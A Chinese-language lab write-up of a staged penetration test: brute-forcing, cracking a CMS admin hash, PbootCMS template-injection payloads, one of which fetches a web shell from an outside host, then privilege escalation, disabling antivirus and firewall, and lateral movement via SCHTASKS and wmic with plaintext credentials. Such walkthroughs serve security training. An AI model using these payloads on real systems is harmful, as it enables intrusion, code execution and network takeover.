项目8
信息收集
使用nmap 判断找到ip
得到ip
192.168.79.179
端口信息收集
web 打点
21
尝试爆破ftp
没有结果
22
爆破,没有结果
80
cms
尝试web 路径爆破
并没有什么作用
根据提示绑定域名
C:\WINDOWS\system32\drivers\etc
打开hosts
添加这个
出现了一个神奇玩意儿
尝试爆破一下路径
尝试观看日志
发现版本
下载config
获取了sqlite
会获取db 文件,然后尝试连接
获取密码
8187bef2c0b83e6b0b747d92b0a65eb1
尝试解密
两次解密获取密码
admin7788
尝试登录
登录成功
CVE-2020-23580 PBootCMS安全漏洞浅析 - 先知社区 (aliyun.com)
根据漏洞利用,写info
1
{pbootpbootpboot:if:if:if(fputs(fopen("info.php","w"),"<?php+".chr(112).chr(104).chr(112).chr(105).chr(110).chr(102).chr(111)."();?>"))}yyy{/pbootpbootpboot:if:if:if}
url 编码
1
{pbootpbootpboot:if:if:if(fputs(fopen("info.php","w"),"<?php ".chr(112).chr(104).chr(112).chr(105).chr(110).chr(102).chr(111)."();?>"))}yyy{/pbootpbootpboot:if:if:if}
然后。。。并没有反应
尝试第二个方法
最新0day! PbootCMS全版本后台通杀任意代码执行漏洞_pbootcms 3.2.5漏洞-CSDN博客
利用失败
尝试第三个方法
添加payload
1
{pboot:if(implode('',['f','i','l','e','_','p','u'.'t','_c','o','n','t','e','n','t','s'])(implode('',['3','.php']), implode('',['<dut_','contentsd,'"shell.php",','file','_get_','contents("','http://192.168.79.1:8000/getshell.txt"))?>'])))}!!!{/pboot:if}
注意将对应的ip 改成自己的http server 的服务
注意提交
然后随便访问3.php
可见成功写入
尝试访问shell.php
没有丝毫问题
尝试蚁剑连接
上线msf
生成一个payload
上传到靶机
开启监听
上线
发现不能执行,使用蚁剑绕过
然后执行就发现上线了
搜索提权漏洞(msf 使用getsystem 会有点问题,就直接搜索漏洞提权)
使用第二个提权成功
查到flag
除此之外还可以使用 docker 进行提权
官方的wp 是通过下载对方的私钥然后及进行ssh
然后使用docker 进行提权
内网信息收集
网段信息收集
使用fscan 进行信息收集
尝试
并没有发现什么
nmap
发现没有nmap 下载一个
发现还存在178 果然还得是namp
178 端口信息收集
内网横向移动
178
8080
又是一个cms
发现登录页面,并且没有验证码,本来想爆破的,但是直接试出来了
admin
123456
找一下漏洞
在最底端发现后台
一次历史漏洞分析与复现的全部过程_jspxcms idea-CSDN博客
制作恶意的zip
1 |
|
尝试上传war 包的zip 然后上传之后,cms 自动解压为war 然后经过tomcat 的解压将war 变成jsp
然后上传这个
然后尝试访问
上线msf
发现上线msf 有一点问题,杀软直接让payload 消失了
先收集杀软的信息
1 |
|
然后获取
发现两个杀软
查看防火墙信息
1 |
|
关闭防火墙
1 |
|
制作免杀,针对360
上传成功
刚好制作cs 的raw 进行绕过,发现并不行,只要上传windows defender 就会
那就基于msf 做渗透
或者使用联动
尝试使用联动
发现迟迟不上线
然后发现了原来靶机出了问题
提权,收集信息
获得密码
想到的是通过rdp将360这个恶心的东西关了
开启远程桌面
1 |
|
有问题?
尝试直接杀掉
舒服了
二层内网信息收集
ip 信息收集
发现还存在10.10.1.1 网段
尝试上传fscan
这个上传不太行
尝试使用msf 进行存货探测
使用arp 进行内网存活探测,挺慢的
尝试搭建代理
使用stowaway
使用msf
二层内网横向移动
没有思路
尝试IPC
发现可以成功连接
刚好发现copy 指令也是可以使用
上传一个正向的payload 然后连接
1
SCHTASKS /Create /S 10.10.1.130 /u administrator /p QWEasd123 /SC ONCE /ST 22:20 /TN test1 /TR c:\windows\temp\august_bind_20091.exe /RU system
1
wmic /node:10.10.1.130 /user:administrator /password:QWEasd123 process list brief